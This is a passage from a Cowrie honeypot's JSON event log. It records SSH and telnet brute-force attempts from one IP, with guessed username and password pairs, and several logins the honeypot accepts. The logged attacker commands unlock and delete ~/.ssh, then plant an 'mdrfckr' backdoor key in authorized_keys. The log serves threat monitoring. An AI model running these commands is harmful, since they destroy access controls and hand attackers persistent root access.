mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T18:54:25.398857Z","src_ip":"212.227.235.229","session":"52587d36c564"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T18:54:25.658967Z","src_ip":"212.227.235.229","session":"52587d36c564"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:54:25.659838Z","src_ip":"212.227.235.229","session":"52587d36c564"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47522,"dst_ip":"1.2.3.4","dst_port":22,"session":"0236f00f0fe3","protocol":"ssh","message":"New connection: 212.227.235.229:47522 (1.2.3.4:22) [session: 0236f00f0fe3]","sensor":"my-vps","timestamp":"2025-08-26T18:54:25.915437Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:54:25.923898Z","src_ip":"212.227.235.229","session":"0236f00f0fe3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:54:26.176589Z","src_ip":"212.227.235.229","session":"0236f00f0fe3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T18:54:27.204178Z","src_ip":"212.227.235.229","session":"0236f00f0fe3"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:54:28.459282Z","src_ip":"212.227.235.229","session":"0236f00f0fe3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48001,"dst_ip":"1.2.3.4","dst_port":22,"session":"9da574f27104","protocol":"ssh","message":"New connection: 212.227.235.229:48001 (1.2.3.4:22) [session: 9da574f27104]","sensor":"my-vps","timestamp":"2025-08-26T18:54:28.711770Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:54:28.715638Z","src_ip":"212.227.235.229","session":"9da574f27104"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:54:28.975084Z","src_ip":"212.227.235.229","session":"9da574f27104"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:54:30.023705Z","src_ip":"212.227.235.229","session":"9da574f27104"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:54:30.286929Z","src_ip":"212.227.235.229","session":"9da574f27104"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:54:30.288922Z","src_ip":"212.227.235.229","session":"52587d36c564"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55890,"dst_ip":"1.2.3.4","dst_port":22,"session":"9430349142fe","protocol":"ssh","message":"New connection: 212.227.235.229:55890 (1.2.3.4:22) [session: 9430349142fe]","sensor":"my-vps","timestamp":"2025-08-26T18:54:33.706724Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:54:33.707948Z","src_ip":"212.227.235.229","session":"9430349142fe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:54:33.984984Z","src_ip":"212.227.235.229","session":"9430349142fe"}
{"eventid":"cowrie.login.failed","username":"sepideh","password":"sepideh123","message":"login attempt [sepideh/sepideh123] failed","sensor":"my-vps","timestamp":"2025-08-26T18:54:35.136205Z","src_ip":"212.227.235.229","session":"9430349142fe"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:54:36.416755Z","src_ip":"212.227.235.229","session":"9430349142fe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57382,"dst_ip":"1.2.3.4","dst_port":23,"session":"c9c47c9ad217","protocol":"telnet","message":"New connection: 212.227.235.229:57382 (1.2.3.4:23) [session: c9c47c9ad217]","sensor":"my-vps","timestamp":"2025-08-26T18:55:21.856911Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59508,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0ba1a039cd3","protocol":"ssh","message":"New connection: 212.227.235.229:59508 (1.2.3.4:22) [session: e0ba1a039cd3]","sensor":"my-vps","timestamp":"2025-08-26T18:55:28.996739Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:55:28.997499Z","src_ip":"212.227.235.229","session":"e0ba1a039cd3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:55:29.252143Z","src_ip":"212.227.235.229","session":"e0ba1a039cd3"}
{"eventid":"cowrie.login.failed","username":"yuxiang","password":"yuxiang","message":"login attempt [yuxiang/yuxiang] failed","sensor":"my-vps","timestamp":"2025-08-26T18:55:30.252917Z","src_ip":"212.227.235.229","session":"e0ba1a039cd3"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:55:31.505555Z","src_ip":"212.227.235.229","session":"e0ba1a039cd3"}
{"eventid":"cowrie.session.closed","duration":12.601305961608887,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:55:34.458151Z","src_ip":"212.227.235.229","session":"c9c47c9ad217"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":10001,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d8a2bf8904f","protocol":"ssh","message":"New connection: 212.227.235.229:10001 (1.2.3.4:22) [session: 2d8a2bf8904f]","sensor":"my-vps","timestamp":"2025-08-26T18:55:42.041021Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T18:55:42.043326Z","src_ip":"212.227.235.229","session":"2d8a2bf8904f"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T18:55:42.147475Z","src_ip":"212.227.235.229","session":"2d8a2bf8904f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"pingvin","message":"login attempt [admin/pingvin] failed","sensor":"my-vps","timestamp":"2025-08-26T18:55:42.650919Z","src_ip":"212.227.235.229","session":"2d8a2bf8904f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"phrases","message":"login attempt [admin/phrases] failed","sensor":"my-vps","timestamp":"2025-08-26T18:55:43.757982Z","src_ip":"212.227.235.229","session":"2d8a2bf8904f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"philipp","message":"login attempt [admin/philipp] failed","sensor":"my-vps","timestamp":"2025-08-26T18:55:44.865138Z","src_ip":"212.227.235.229","session":"2d8a2bf8904f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36414,"dst_ip":"1.2.3.4","dst_port":22,"session":"2835de0860b2","protocol":"ssh","message":"New connection: 212.227.235.229:36414 (1.2.3.4:22) [session: 2835de0860b2]","sensor":"my-vps","timestamp":"2025-08-26T18:55:44.866450Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:55:45.562412Z","src_ip":"212.227.235.229","session":"2835de0860b2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T18:55:45.564029Z","src_ip":"212.227.235.229","session":"2835de0860b2"}
{"eventid":"cowrie.login.failed","username":"admin","password":"pass12","message":"login attempt [admin/pass12] failed","sensor":"my-vps","timestamp":"2025-08-26T18:55:45.971028Z","src_ip":"212.227.235.229","session":"2d8a2bf8904f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"pamel","message":"login attempt [admin/pamel] failed","sensor":"my-vps","timestamp":"2025-08-26T18:55:47.077712Z","src_ip":"212.227.235.229","session":"2d8a2bf8904f"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:55:48.183906Z","src_ip":"212.227.235.229","session":"2d8a2bf8904f"}
{"eventid":"cowrie.login.success","username":"root","password":"Nirek@123","message":"login attempt [root/Nirek@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:55:48.525658Z","src_ip":"212.227.235.229","session":"2835de0860b2"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:55:49.018546Z","src_ip":"212.227.235.229","session":"2835de0860b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33996,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f8dbf36bcec","protocol":"ssh","message":"New connection: 212.227.235.229:33996 (1.2.3.4:22) [session: 5f8dbf36bcec]","sensor":"my-vps","timestamp":"2025-08-26T18:56:02.360855Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:56:02.362108Z","src_ip":"212.227.235.229","session":"5f8dbf36bcec"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:56:02.593759Z","src_ip":"212.227.235.229","session":"5f8dbf36bcec"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:56:03.021950Z","src_ip":"212.227.235.229","session":"5f8dbf36bcec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43971,"dst_ip":"1.2.3.4","dst_port":22,"session":"d46015bf2690","protocol":"ssh","message":"New connection: 212.227.235.229:43971 (1.2.3.4:22) [session: d46015bf2690]","sensor":"my-vps","timestamp":"2025-08-26T18:56:34.085032Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:56:34.089750Z","src_ip":"212.227.235.229","session":"d46015bf2690"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:56:34.336094Z","src_ip":"212.227.235.229","session":"d46015bf2690"}
{"eventid":"cowrie.login.success","username":"root","password":"Ss123456","message":"login attempt [root/Ss123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:56:35.326725Z","src_ip":"212.227.235.229","session":"d46015bf2690"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:56:35.886604Z","src_ip":"212.227.235.229","session":"d46015bf2690"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T18:56:35.887429Z","src_ip":"212.227.235.229","session":"d46015bf2690"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T18:56:35.888362Z","src_ip":"212.227.235.229","session":"d46015bf2690"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:56:36.136707Z","src_ip":"212.227.235.229","session":"d46015bf2690"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:56:36.656997Z","src_ip":"212.227.235.229","session":"d46015bf2690"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T18:56:36.657717Z","src_ip":"212.227.235.229","session":"d46015bf2690"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T18:56:36.907415Z","src_ip":"212.227.235.229","session":"d46015bf2690"}
